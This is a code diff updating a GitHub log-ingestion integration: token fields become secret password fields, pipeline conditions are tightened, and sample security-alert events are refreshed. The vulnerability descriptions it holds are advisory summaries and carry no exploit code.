httpjson vars: - name: access_token - type: text + type: password title: Personal Access Token description: the GitHub Personal Access Token. Requires `read:audit_log` scope multi: false required: true show_user: true + secret: true - name: organization type: text title: Organization Name diff --git a/packages/github/data_stream/audit/sample_event.json b/packages/github/data_stream/audit/sample_event.json index 6c158fc2748..99f6ad6593b 100644 --- a/packages/github/data_stream/audit/sample_event.json +++ b/packages/github/data_stream/audit/sample_event.json @@ -1,11 +1,11 @@ { "@timestamp": "2020-11-18T17:05:48.837Z", "agent": { - "ephemeral_id": "fbdd879c-8de1-464b-a6a2-dbd9847eff73", - "id": "f86f831a-cae2-454f-a985-4f579b0ee515", + "ephemeral_id": "9246e7d9-fcc1-46ab-b3fd-2d0888f2a94d", + "id": "ad5c3ec8-3015-4cd2-a269-a2f3df062a2c", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.7.1" + "version": "8.12.0" }, "data_stream": { "dataset": "github.audit", @@ -16,9 +16,9 @@ "version": "8.11.0" }, "elastic_agent": { - "id": "f86f831a-cae2-454f-a985-4f579b0ee515", + "id": "ad5c3ec8-3015-4cd2-a269-a2f3df062a2c", "snapshot": false, - "version": "8.7.1" + "version": "8.12.0" }, "event": { "action": "repo.destroy", @@ -27,10 +27,10 @@ "configuration", "web" ], - "created": "2023-09-28T20:59:05.392Z", + "created": "2024-01-18T15:58:09.826Z", "dataset": "github.audit", "id": "LwW2vpJZCDS-WUmo9Z-ifw", - "ingested": "2023-09-28T20:59:06Z", + "ingested": "2024-01-18T15:58:19Z", "kind": "event", "original": "{\"@timestamp\":1605719148837,\"_document_id\":\"LwW2vpJZCDS-WUmo9Z-ifw\",\"action\":\"repo.destroy\",\"actor\":\"monalisa\",\"created_at\":1605719148837,\"org\":\"mona-org\",\"repo\":\"mona-org/mona-test-repo\",\"visibility\":\"private\"}", "type": [ @@ -58,4 +58,4 @@ "user": { "name": "monalisa" } -} +} \ No newline at end of file diff --git a/packages/github/data_stream/code_scanning/elasticsearch/ingest_pipeline/default.yml b/packages/github/data_stream/code_scanning/elasticsearch/ingest_pipeline/default.yml index 23c78fc40ee..97b60010b63 100644 --- a/packages/github/data_stream/code_scanning/elasticsearch/ingest_pipeline/default.yml +++ b/packages/github/data_stream/code_scanning/elasticsearch/ingest_pipeline/default.yml @@ -18,6 +18,9 @@ processors: - json: field: event.original target_field: github.code_scanning + - fail: + if: "!(ctx.github.code_scanning instanceof Map)" + message: Missing JSON object - fingerprint: fields: - github.code_scanning.number @@ -30,21 +33,21 @@ processors: - ISO8601 timezone: UTC target_field: "event.created" - if: ctx.github.code_scanning?.created_at != null + if: ctx.github.code_scanning.created_at != null - date: field: github.code_scanning.created_at formats: - ISO8601 timezone: UTC target_field: "@timestamp" - if: ctx.github.code_scanning?.created_at != null + if: ctx.github.code_scanning.created_at != null - date: field: github.code_scanning.updated_at formats: - ISO8601 timezone: UTC target_field: "@timestamp" - if: ctx.github.code_scanning?.updated_at != null + if: ctx.github.code_scanning.updated_at != null - rename: target_field: _temp field: github.code_scanning.repository @@ -112,11 +115,11 @@ processors: - set: field: github.repository.html_url value: "https://github.com/{{_temp.owner}}/{{_temp.repository}}" - if: "ctx.github.repository?.html_url == null && ctx._temp?.owner != null && ctx._temp?.repository != null" + if: ctx.github.repository?.html_url == null && ctx._temp?.owner != null && ctx._temp?.repository != null - set: field: github.repository.url value: "https://api.github.com/repos/{{_temp.owner}}/{{_temp.repository}}" - if: "ctx.github.repository?.url == null && ctx._temp?.owner != null && ctx._temp?.repository != null" + if: ctx.github.repository?.url == null && ctx._temp?.owner != null && ctx._temp?.repository != null - rename: field: _temp.repository target_field: github.repository.name @@ -130,7 +133,7 @@ processors: - rename: field: _temp.number target_field: github.code_scanning.number - if: ctx.github.code_scanning?.number == null + if: ctx.github.code_scanning.number == null ignore_missing: true - lowercase: field: github.code_scanning.state @@ -141,7 +144,7 @@ processors: - set: field: github.severity value: "{{github.code_scanning.rule.security_severity_level}}" - if: ctx.github.code_scanning?.rule?.security_severity_level != null + if: ctx.github.code_scanning.rule?.security_severity_level != null - set: field: github.severity value: "undefined" @@ -149,7 +152,7 @@ processors: - set: field: github.state value: "{{github.code_scanning.state}}" - if: ctx.github.code_scanning?.state != null + if: ctx.github.code_scanning.state != null - rename: target_field: _temp.dismissed_by field: github.code_scanning.dismissed_by @@ -188,7 +191,7 @@ processors: - script: lang: painless description: Calculate time taken to resolve the alerts - if: ctx.github.code_scanning?.fixed_at != null || ctx.github.code_scanning?.dismissed_at != null + if: ctx.github.code_scanning.fixed_at != null || ctx.github.code_scanning.dismissed_at != null source: | def time_to_resolution = new HashMap(); def fixedAtDt = ctx.github.code_scanning.fixed_at; @@ -214,15 +217,15 @@ processors: - rename: field: github.code_scanning.rule.id target_field: rule.id - if: ctx.github.code_scanning?.rule?.id != null + if: ctx.github.code_scanning.rule?.id != null - rename: field: github.code_scanning.rule.name target_field: rule.name - if: ctx.github.code_scanning?.rule?.name != null + if: ctx.github.code_scanning.rule?.name != null - rename: field: github.code_scanning.rule.description target_field: rule.description - if: ctx.github.code_scanning?.rule?.description != null + if: ctx.github.code_scanning.rule?.description != null - foreach: field: "github.code_scanning.rule.tags" processor: @@ -230,7 +233,7 @@ processors: field: tags value: "{{_ingest._value}}" ignore_missing: true - if: ctx.github.code_scanning?.rule?.tags != null + if: ctx.github.code_scanning.rule?.tags != null - remove: field: github.code_scanning.rule.tags ignore_missing: true @@ -243,7 +246,7 @@ processors: ignore_missing: true - remove: field: event.original - if: "ctx.tags == null || !(ctx.tags.contains('preserve_original_event'))" + if: ctx.tags?.contains('preserve_original_event') != true ignore_failure: true ignore_missing: true - script: diff --git a/packages/github/data_stream/code_scanning/manifest.yml b/packages/github/data_stream/code_scanning/manifest.yml index 76f50bf3931..64b913f5f05 100644 --- a/packages/github/data_stream/code_scanning/manifest.yml +++ b/packages/github/data_stream/code_scanning/manifest.yml @@ -4,12 +4,13 @@ streams: - input: httpjson vars: - name: access_token - type: text + type: password title: Personal Access Token description: the GitHub Personal Access Token. Requires the 'public_repo' scope for public repositories and 'security_events' scope for private repositories. \nSee [List code scanning alerts for a repository](https://docs.github.com/en/rest/code-scanning#list-code-scanning-alerts-for-a-repository) multi: false required: true show_user: true + secret: true - name: owner type: text title: Repository owner diff --git a/packages/github/data_stream/code_scanning/sample_event.json b/packages/github/data_stream/code_scanning/sample_event.json index d90712e04ac..a667915dcd4 100644 --- a/packages/github/data_stream/code_scanning/sample_event.json +++ b/packages/github/data_stream/code_scanning/sample_event.json @@ -1,11 +1,11 @@ { "@timestamp": "2022-06-29T18:03:27.000Z", "agent": { - "ephemeral_id": "1a42d4f4-d9bb-4b37-ad28-0da74f732b5b", - "id": "f86f831a-cae2-454f-a985-4f579b0ee515", + "ephemeral_id": "b359acfc-81ff-4631-8a85-05f9627d12e4", + "id": "ad5c3ec8-3015-4cd2-a269-a2f3df062a2c", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.7.1" + "version": "8.12.0" }, "data_stream": { "dataset": "github.code_scanning", @@ -16,16 +16,16 @@ "version": "8.11.0" }, "elastic_agent": { - "id": "f86f831a-cae2-454f-a985-4f579b0ee515", + "id": "ad5c3ec8-3015-4cd2-a269-a2f3df062a2c", "snapshot": false, - "version": "8.7.1" + "version": "8.12.0" }, "event": { "action": "code_scanning", "agent_id_status": "verified", "created": "2022-06-29T18:03:27.000Z", "dataset": "github.code_scanning", - "ingested": "2023-09-28T21:00:06Z", + "ingested": "2024-01-18T15:59:07Z", "kind": "alert", "original": "{\"created_at\":\"2022-06-29T18:03:27Z\",\"html_url\":\"https://github.com/sample_owner/sample_repo/security/code-scanning/91\",\"most_recent_instance\":{\"analysis_key\":\".github/workflows/codeql-analysis.yml:analyze\",\"category\":\".github/workflows/codeql-analysis.yml:analyze/language:javascript\",\"classifications\":[],\"commit_sha\":\"3244e8b15cc1b8f2732eecd69fc1890b737f0dda\",\"location\":{\"end_column\":50,\"end_line\":67,\"path\":\"routes/chatbot.ts\",\"start_column\":23,\"start_line\":67},\"message\":{\"text\":\"(Experimental) This may be a database query that depends on a user-provided value. Identified using machine learning.(Experimental) This may be a database query that depends on a user-provided value. Identified using machine learning.\"},\"ref\":\"refs/heads/master\",\"state\":\"open\"},\"number\":90,\"rule\":{\"description\":\"SQL database query built from user-controlled sources (experimental)\",\"id\":\"js/ml-powered/sql-injection\",\"security_severity_level\":\"high\",\"severity\":\"error\",\"tags\":[\"experimental\",\"external/cwe/cwe-089\",\"security\"]},\"state\":\"open\",\"tool\":{\"name\":\"CodeQL\",\"version\":\"2.9.4\"},\"updated_at\":\"2022-06-29T18:03:27Z\",\"url\":\"https://api.github.com/repos/sample_owner/sample_repo/code-scanning/alerts/91\"}" }, @@ -87,4 +87,4 @@ "external/cwe/cwe-089", "security" ] -} +} \ No newline at end of file diff --git a/packages/github/data_stream/dependabot/_dev/test/pipeline/test-ghas-dependabot-json.log-expected.json b/packages/github/data_stream/dependabot/_dev/test/pipeline/test-ghas-dependabot-json.log-expected.json index 6cc662989a1..82b79bf1ca2 100644 --- a/packages/github/data_stream/dependabot/_dev/test/pipeline/test-ghas-dependabot-json.log-expected.json +++ b/packages/github/data_stream/dependabot/_dev/test/pipeline/test-ghas-dependabot-json.log-expected.json @@ -28,7 +28,7 @@ "classification": "GENERAL", "cwes": [ { - "cweId": "CWE-20", + "cwe_id": "CWE-20", "description": "The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.", "name": "Improper Input Validation" } @@ -135,7 +135,7 @@ "classification": "GENERAL", "cwes": [ { - "cweId": "CWE-79", + "cwe_id": "CWE-79", "description": "The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.", "name": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')" } @@ -246,7 +246,7 @@ }, "cwes": [ { - "cweId": "CWE-79", + "cwe_id": "CWE-79", "description": "The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.", "name": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')" } @@ -358,7 +358,7 @@ }, "cwes": [ { - "cweId": "CWE-285", + "cwe_id": "CWE-285", "description": "The software does not perform or incorrectly performs an authorization check when an actor attempts to access a resource or perform an action.", "name": "Improper Authorization" } @@ -456,7 +456,7 @@ "classification": "GENERAL", "cwes": [ { - "cweId": "CWE-77", + "cwe_id": "CWE-77", "description": "The software constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component.", "name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')" } @@ -555,7 +555,7 @@ }, "cwes": [ { - "cweId": "CWE-20", + "cwe_id": "CWE-20", "description": "The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.", "name": "Improper Input Validation" } @@ -672,7 +672,7 @@ }, "cwes": [ { - "cweId": "CWE-20", + "cwe_id": "CWE-20", "description": "The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.", "name": "Improper Input Validation" } @@ -781,7 +781,7 @@ }, "cwes": [ { - "cweId": "CWE-248", + "cwe_id": "CWE-248", "description": "An exception is thrown from a function, but it is not caught.", "name": "Uncaught Exception" } diff --git a/packages/github/data_stream/dependabot/elasticsearch/ingest_pipeline/default.yml b/packages/github/data_stream/dependabot/elasticsearch/ingest_pipeline/default.yml index b765582df21..2cff0f148d7 100644 --- a/packages/github/data_stream/dependabot/elasticsearch/ingest_pipeline/default.yml +++ b/packages/github/data_stream/dependabot/elasticsearch/ingest_pipeline/default.yml @@ -18,6 +18,9 @@ processors: - json: field: event.original target_field: github.dependabot + - fail: + if: "!(ctx.github.dependabot instanceof Map)" + message: Missing JSON object - set: field: _temp.updated_at value: "{{{_ingest.timestamp}}}" @@ -41,7 +44,7 @@ processors: - ISO8601 timezone: UTC target_field: "event.created" - if: ctx.github.dependabot?.created_at != null + if: ctx.github.dependabot.created_at != null - rename: field: github.dependabot.dependabotUpdate target_field: github.dependabot.dependabot_update @@ -72,21 +75,21 @@ processors: - ISO8601 timezone: UTC target_field: "@timestamp" - if: ctx.github.dependabot?.created_at != null + if: ctx.github.dependabot.created_at != null - date: field: github.dependabot.dismissed_at formats: - ISO8601 timezone: UTC target_field: "@timestamp" - if: ctx.github.dependabot?.dismissed_at != null + if: ctx.github.dependabot.dismissed_at != null - date: field: github.dependabot.fixed_at formats: - ISO8601 timezone: UTC target_field: "@timestamp" - if: ctx.github.dependabot?.fixed_at != null + if: ctx.github.dependabot.fixed_at != null - rename: field: github.dependabot.repository.isInOrganization target_field: github.dependabot.repository.is_in_organization @@ -118,7 +121,7 @@ processors: - set: field: _temp.cwes copy_from: github.dependabot.security_advisory.cwes.nodes - if: ctx.github.dependabot?.security_advisory?.cwes?.nodes != null + if: ctx.github.dependabot.security_advisory?.cwes?.nodes != null - remove: field: github.dependabot.security_advisory.cwes ignore_missing: true @@ -126,6 +129,16 @@ processors: field: github.dependabot.security_advisory.cwes copy_from: _temp.cwes if: ctx._temp?.cwes != null + - foreach: + field: github.dependabot.security_advisory.cwes + if: ctx.github?.dependabot?.security_advisory?.cwes instanceof List + ignore_failure: true + processor: + rename: + field: _ingest._value.cweId + tag: rename_cweId + target_field: _ingest._value.cwe_id + ignore_missing: true - rename: field: github.dependabot.securityVulnerability target_field: github.dependabot.security_vulnerability @@ -226,19 +239,19 @@ processors: - set: field: "event.start" copy_from: github.dependabot.created_at - if: ctx.github.dependabot?.created_at != null + if: ctx.github.dependabot.created_at != null - set: field: "event.end" copy_from: github.dependabot.fixed_at - if: ctx.github.dependabot?.fixed_at != null + if: ctx.github.dependabot.fixed_at != null - set: field: "event.end" copy_from: github.dependabot.dismissed_at - if: ctx.event?.end == null && ctx.github.dependabot?.dismissed_at != null + if: ctx.event?.end == null && ctx.github.dependabot.dismissed_at != null - script: lang: painless description: Calculate time taken to resolve the alerts - if: ctx?.event?.start != null && ctx?.event?.end != null + if: ctx.event?.start != null && ctx.event?.end != null source: >- ZonedDateTime start = ZonedDateTime.parse(ctx.event.start); ZonedDateTime end = ZonedDateTime.parse(ctx.event.end); ctx.event.duration = ChronoUnit.NANOS.between(start, end); ################################# @@ -253,7 +266,7 @@ processors: - set: field: github.state copy_from: github.dependabot.state - if: ctx.github.dependabot?.state != null + if: ctx.github.dependabot.state != null - set: field: github.severity copy_from: vulnerability.severity @@ -275,7 +288,7 @@ processors: ignore_missing: true - remove: field: event.original - if: "ctx.tags == null || !(ctx.tags.contains('preserve_original_event'))" + if: ctx.tags?.contains('preserve_original_event') != true ignore_failure: true ignore_missing: true - script: diff --git a/packages/github/data_stream/dependabot/manifest.yml b/packages/github/data_stream/dependabot/manifest.yml index b8c760c1081..7286dd78e8e 100644 --- a/packages/github/data_stream/dependabot/manifest.yml +++ b/packages/github/data_stream/dependabot/manifest.yml @@ -4,12 +4,13 @@ streams: - input: httpjson vars: - name: access_token - type: text + type: password title: Personal Access Token description: The GitHub Personal Access Token. \nSee [Authenticating with GraphQL](https://docs.github.com/en/graphql/guides/forming-calls-with-graphql#authenticating-with-graphql) multi: false required: true show_user: true + secret: true - name: owner type: text title: Repository owner diff --git a/packages/github/data_stream/dependabot/sample_event.json b/packages/github/data_stream/dependabot/sample_event.json index f822f7b3c2a..ad1c8f20831 100644 --- a/packages/github/data_stream/dependabot/sample_event.json +++ b/packages/github/data_stream/dependabot/sample_event.json @@ -1,11 +1,11 @@ { "@timestamp": "2022-07-11T11:39:07.000Z", "agent": { - "ephemeral_id": "d5a942e6-27ef-4ef0-b922-fbc0084f6e1c", - "id": "f86f831a-cae2-454f-a985-4f579b0ee515", + "ephemeral_id": "786d0d42-a64a-43ae-846d-03d72b473384", + "id": "ad5c3ec8-3015-4cd2-a269-a2f3df062a2c", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.7.1" + "version": "8.12.0" }, "data_stream": { "dataset": "github.dependabot", @@ -16,16 +16,16 @@ "version": "8.11.0" }, "elastic_agent": { - "id": "f86f831a-cae2-454f-a985-4f579b0ee515", + "id": "ad5c3ec8-3015-4cd2-a269-a2f3df062a2c", "snapshot": false, - "version": "8.7.1" + "version": "8.12.0" }, "event": { "action": "dependabot", "agent_id_status": "verified", "created": "2022-07-11T11:39:07.000Z", "dataset": "github.dependabot", - "ingested": "2023-09-28T21:01:11Z", + "ingested": "2024-01-18T15:59:57Z", "kind": "alert", "original": "{\"createdAt\":\"2022-07-11T11:39:07Z\",\"dependabotUpdate\":{\"error\":{\"body\":\"The currently installed version can't be determined.\\n\\nTo resolve the issue add a supported lockfile (package-lock.json or yarn.lock).\",\"errorType\":\"dependency_file_not_supported\",\"title\":\"Dependabot can't update vulnerable dependencies without a lockfile\"},\"pullRequest\":null},\"dependencyScope\":\"RUNTIME\",\"dismissReason\":null,\"dismissedAt\":null,\"dismisser\":null,\"fixedAt\":null,\"number\":1,\"repository\":{\"description\":\"OWASP Juice Shop: Probably the most modern and sophisticated insecure web application\",\"isInOrganization\":false,\"isPrivate\":false,\"name\":\"sample_repo\",\"owner\":{\"login\":\"sample_owner\",\"url\":\"https://github.com/sample_owner\"},\"url\":\"https://github.com/sample_owner/sample_repo\"},\"securityAdvisory\":{\"classification\":\"GENERAL\",\"cvss\":{\"score\":0,\"vectorString\":null},\"cwes\":{\"nodes\":[{\"cweId\":\"CWE-20\",\"description\":\"The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.\",\"name\":\"Improper Input Validation\"}]},\"description\":\"Versions 4.2.1 and earlier of `jsonwebtoken` are affected by a verification bypass vulnerability. This is a result of weak validation of the JWT algorithm type, occuring when an attacker is allowed to arbitrarily specify the JWT algorithm.\\n\\n\\n\\n\\n## Recommendation\\n\\nUpdate to version 4.2.2 or later.\",\"ghsaId\":\"GHSA-c7hr-j4mj-j2w6\",\"identifiers\":[{\"type\":\"GHSA\",\"value\":\"GHSA-c7hr-j4mj-j2w6\"},{\"type\":\"CVE\",\"value\":\"CVE-2015-9235\"}],\"origin\":\"UNSPECIFIED\",\"permalink\":\"https://github.com/advisories/GHSA-c7hr-j4mj-j2w6\",\"publishedAt\":\"2018-10-09T00:38:30Z\",\"references\":[{\"url\":\"https://nvd.nist.gov/vuln/detail/CVE-2015-9235\"},{\"url\":\"https://github.com/auth0/node-jsonwebtoken/commit/1bb584bc382295eeb7ee8c4452a673a77a68b687\"},{\"url\":\"https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries/\"},{\"url\":\"https://github.com/advisories/GHSA-c7hr-j4mj-j2w6\"},{\"url\":\"https://www.npmjs.com/advisories/17\"},{\"url\":\"https://www.timmclean.net/2015/02/25/jwt-alg-none.html\"},{\"url\":\"https://nodesecurity.io/advisories/17\"}],\"severity\":\"CRITICAL\",\"summary\":\"Verification Bypass in jsonwebtoken\",\"updatedAt\":\"2021-01-08T19:00:39Z\",\"withdrawnAt\":null},\"securityVulnerability\":{\"firstPatchedVersion\":{\"identifier\":\"4.2.2\"},\"package\":{\"ecosystem\":\"NPM\",\"name\":\"jsonwebtoken\"},\"severity\":\"CRITICAL\",\"updatedAt\":\"2018-11-30T19:54:28Z\",\"vulnerableVersionRange\":\"\\u003c 4.2.2\"},\"state\":\"OPEN\",\"vulnerableManifestFilename\":\"package.json\",\"vulnerableManifestPath\":\"package.json\",\"vulnerableRequirements\":\"= 0.4.0\"}", "start": "2022-07-11T11:39:07Z" @@ -46,7 +46,7 @@ "classification": "GENERAL", "cwes": [ { - "cweId": "CWE-20", + "cwe_id": "CWE-20", "description": "The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.", "name": "Improper Input Validation" } @@ -129,4 +129,4 @@ }, "severity": "critical" } -} +} \ No newline at end of file diff --git a/packages/github/data_stream/issues/elasticsearch/ingest_pipeline/default.yml b/packages/github/data_stream/issues/elasticsearch/ingest_pipeline/default.yml index 7f76d37970d..2154fc53bc0 100644 --- a/packages/github/data_stream/issues/elasticsearch/ingest_pipeline/default.yml +++ b/packages/github/data_stream/issues/elasticsearch/ingest_pipeline/default.yml @@ -18,8 +18,11 @@ processors: - json: field: event.original target_field: github.issues + - fail: + if: "!(ctx.github.issues instanceof Map)" + message: Missing JSON object - fingerprint: - if: ctx.github?.issues?.url != null + if: ctx.github.issues.url != null fields: - github.issues.url target_field: "_id" @@ -30,7 +33,7 @@ processors: - ISO8601 timezone: UTC target_field: "@timestamp" - if: ctx.github.issues?.created_at != null + if: ctx.github.issues.created_at != null - set: field: event.created copy_from: "@timestamp" @@ -39,7 +42,7 @@ processors: field: github.issues.is_pr value: false - set: - if: ctx.github?.issues?.pull_request != null + if: ctx.github.issues.pull_request != null field: github.issues.is_pr value: true - date: @@ -48,7 +51,7 @@ processors: - ISO8601 timezone: UTC target_field: github.issues.updated_at - if: ctx.github.issues?.updated_at != null + if: ctx.github.issues.updated_at != null - dissect: field: github.issues.url pattern: "https://api.github.com/repos/%{_temp_.owner}/%{_temp_.repository}/issues/%{_temp_.number}" @@ -56,23 +59,23 @@ processors: - set: field: github.repository.name value: "{{_temp_.repository}}" - if: "ctx._temp_?.repository != null" + if: ctx._temp_?.repository != null - set: field: github.repository.html_url value: "https://github.com/{{_temp_.owner}}/{{_temp_.repository}}" - if: "ctx._temp_?.owner != null && ctx._temp_?.repository != null" + if: ctx._temp_?.owner != null && ctx._temp_?.repository != null - set: field: github.repository.url value: "https://api.github.com/repos/{{_temp_.owner}}/{{_temp_.repository}}" - if: "ctx._temp_?.owner != null && ctx._temp_?.repository != null" + if: ctx._temp_?.owner != null && ctx._temp_?.repository != null - set: field: github.repository.owner.login value: "{{_temp_.owner}}" - if: "ctx._temp_?.owner != null" + if: ctx._temp_?.owner != null - set: field: github.state value: "{{github.issues.state}}" - if: ctx.github.issues?.state != null + if: ctx.github.issues.state != null - foreach: field: github.issues.assignees ignore_missing: true @@ -143,7 +146,7 @@ processors: - script: lang: painless description: Calculate time taken to close an issue - if: ctx.github?.issues?.closed_at != null + if: ctx.github.issues.closed_at != null source: | def time_to_close = new HashMap(); def closedAtDt = ctx.github.issues.closed_at; @@ -160,7 +163,7 @@ processors: - set: field: user.name copy_from: github.issues.user.login - if: ctx.github?.issues?.user?.login != null + if: ctx.github.issues.user?.login != null - convert: field: github.issues.user.id type: string @@ -169,7 +172,7 @@ processors: - append: field: user.roles value: ['site_admin'] - if: 'ctx.github?.issues?.user?.site_admin != null && ctx.github?.issues?.user?.site_admin == true' + if: ctx.github.issues.user?.site_admin != null && ctx.github.issues.user?.site_admin == true allow_duplicates: false ################### # Related ECS fields # @@ -181,7 +184,7 @@ processors: allow_duplicates: false - foreach: field: github.issues.assignees - if: ctx.github?.issues?.assignees != null + if: ctx.github.issues.assignees != null processor: append: field: related.user @@ -198,11 +201,11 @@ processors: - remove: field: - github.issues.state - if: "ctx.tags == null || !(ctx.tags.contains('preserve_duplicate_custom_fields'))" + if: ctx.tags?.contains('preserve_duplicate_custom_fields') != true ignore_missing: true - remove: field: event.original - if: "ctx.tags == null || !(ctx.tags.contains('preserve_original_event'))" + if: ctx.tags?.contains('preserve_original_event') != true ignore_failure: true ignore_missing: true - script: diff --git a/packages/github/data_stream/issues/manifest.yml b/packages/github/data_stream/issues/manifest.yml index 886e2092fd8..75c074e1d3c 100644 --- a/packages/github/data_stream/issues/manifest.yml +++ b/packages/github/data_stream/issues/manifest.yml @@ -5,12 +5,13 @@ streams: - input: httpjson vars: - name: access_token - type: text + type: password title: Personal Access Token description: the GitHub Personal Access Token. multi: false required: true show_user: true + secret: true - name: owner type: text title: Repository owner diff --git a/packages/github/data_stream/issues/sample_event.json b/packages/github/data_stream/issues/sample_event.json index 894f393c22f..e922b4d30b9 100644 --- a/packages/github/data_stream/issues/sample_event.json +++ b/packages/github/data_stream/issues/sample_event.json @@ -1,11 +1,11 @@ { "@timestamp": "2011-04-22T13:33:48.000Z", "agent": { - "ephemeral_id": "f9522412-8a4b-49a9-9c7c-0f5e5925ca64", - "id": "f86f831a-cae2-454f-a985-4f579b0ee515", + "ephemeral_id": "584c482b-3ffa-4d41-8926-c8194940a361", + "id": "ad5c3ec8-3015-4cd2-a269-a2f3df062a2c", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.7.1" + "version": "8.12.0" }, "data_stream": { "dataset": "github.issues", @@ -16,16 +16,16 @@ "version": "8.11.0" }, "elastic_agent": { - "id": "f86f831a-cae2-454f-a985-4f579b0ee515", + "id": "ad5c3ec8-3015-4cd2-a269-a2f3df062a2c", "snapshot": false, - "version": "8.7.1" + "version": "8.12.0" }, "event": { "action": "event", "agent_id_status": "verified", "created": "2011-04-22T13:33:48.000Z", "dataset": "github.issues", - "ingested": "2023-09-28T21:02:11Z", + "ingested": "2024-01-18T16:00:55Z", "kind": "event", "original": "{\"active_lock_reason\":\"too heated\",\"assignee\":{\"avatar_url\":\"https://github.com/images/error/octocat_happy.gif\",\"events_url\":\"https://api.github.com/users/octocat/events{/privacy}\",\"followers_url\":\"https://api.github.com/users/octocat/followers\",\"following_url\":\"https://api.github.com/users/octocat/following{/other_user}\",\"gists_url\":\"https://api.github.com/users/octocat/gists{/gist_id}\",\"gravatar_id\":\"\",\"html_url\":\"https://github.com/octocat\",\"id\":1,\"login\":\"octocat\",\"node_id\":\"MDQ6VXNlcjE=\",\"organizations_url\":\"https://api.github.com/users/octocat/orgs\",\"received_events_url\":\"https://api.github.com/users/octocat/received_events\",\"repos_url\":\"https://api.github.com/users/octocat/repos\",\"site_admin\":false,\"starred_url\":\"https://api.github.com/users/octocat/starred{/owner}{/repo}\",\"subscriptions_url\":\"https://api.github.com/users/octocat/subscriptions\",\"type\":\"User\",\"url\":\"https://api.github.com/users/octocat\"},\"assignees\":[{\"avatar_url\":\"https://github.com/images/error/octocat_happy.gif\",\"events_url\":\"https://api.github.com/users/octocat/events{/privacy}\",\"followers_url\":\"https://api.github.com/users/octocat/followers\",\"following_url\":\"https://api.github.com/users/octocat/following{/other_user}\",\"gists_url\":\"https://api.github.com/users/octocat/gists{/gist_id}\",\"gravatar_id\":\"\",\"html_url\":\"https://github.com/octocat\",\"id\":1,\"login\":\"octocat\",\"node_id\":\"MDQ6VXNlcjE=\",\"organizations_url\":\"https://api.github.com/users/octocat/orgs\",\"received_events_url\":\"https://api.github.com/users/octocat/received_events\",\"repos_url\":\"https://api.github.com/users/octocat/repos\",\"site_admin\":false,\"starred_url\":\"https://api.github.com/users/octocat/starred{/owner}{/repo}\",\"subscriptions_url\":\"https://api.github.com/users/octocat/subscriptions\",\"type\":\"User\",\"url\":\"https://api.github.com/users/octocat\"}],\"author_association\":\"COLLABORATOR\",\"body\":\"I'm having a problem with this.\",\"closed_at\":null,\"closed_by\":{\"avatar_url\":\"https://github.com/images/error/octocat_happy.gif\",\"events_url\":\"https://api.github.com/users/octocat/events{/privacy}\",\"followers_url\":\"https://api.github.com/users/octocat/followers\",\"following_url\":\"https://api.github.com/users/octocat/following{/other_user}\",\"gists_url\":\"https://api.github.com/users/octocat/gists{/gist_id}\",\"gravatar_id\":\"\",\"html_url\":\"https://github.com/octocat\",\"id\":1,\"login\":\"octocat\",\"node_id\":\"MDQ6VXNlcjE=\",\"organizations_url\":\"https://api.github.com/users/octocat/orgs\",\"received_events_url\":\"https://api.github.com/users/octocat/received_events\",\"repos_url\":\"https://api.github.com/users/octocat/repos\",\"site_admin\":false,\"starred_url\":\"https://api.github.com/users/octocat/starred{/owner}{/repo}\",\"subscriptions_url\":\"https://api.github.com/users/octocat/subscriptions\",\"type\":\"User\",\"url\":\"https://api.github.com/users/octocat\"},\"comments\":0,\"comments_url\":\"https://api.github.com/repos/octocat/Hello-World/issues/1347/comments\",\"created_at\":\"2011-04-22T13:33:48Z\",\"events_url\":\"https://api.github.com/repos/octocat/Hello-World/issues/1347/events\",\"html_url\":\"https://github.com/octocat/Hello-World/issues/1347\",\"id\":1,\"labels\":[{\"color\":\"f29513\",\"default\":true,\"description\":\"Something isn't working\",\"id\":208045946,\"name\":\"bug\",\"node_id\":\"MDU6TGFiZWwyMDgwNDU5NDY=\",\"url\":\"https://api.github.com/repos/octocat/Hello-World/labels/bug\"}],\"labels_url\":\"https://api.github.com/repos/octocat/Hello-World/issues/1347/labels{/name}\",\"locked\":true,\"milestone\":{\"closed_at\":\"2013-02-12T13:22:01Z\",\"closed_issues\":8,\"created_at\":\"2011-04-10T20:09:31Z\",\"creator\":{\"avatar_url\":\"https://github.com/images/error/octocat_happy.gif\",\"events_url\":\"https://api.github.com/users/octocat/events{/privacy}\",\"followers_url\":\"https://api.github.com/users/octocat/followers\",\"following_url\":\"https://api.github.com/users/octocat/following{/other_user}\",\"gists_url\":\"https://api.github.com/users/octocat/gists{/gist_id}\",\"gravatar_id\":\"\",\"html_url\":\"https://github.com/octocat\",\"id\":1,\"login\":\"octocat\",\"node_id\":\"MDQ6VXNlcjE=\",\"organizations_url\":\"https://api.github.com/users/octocat/orgs\",\"received_events_url\":\"https://api.github.com/users/octocat/received_events\",\"repos_url\":\"https://api.github.com/users/octocat/repos\",\"site_admin\":false,\"starred_url\":\"https://api.github.com/users/octocat/starred{/owner}{/repo}\",\"subscriptions_url\":\"https://api.github.com/users/octocat/subscriptions\",\"type\":\"User\",\"url\":\"https://api.github.com/users/octocat\"},\"description\":\"Tracking milestone for version 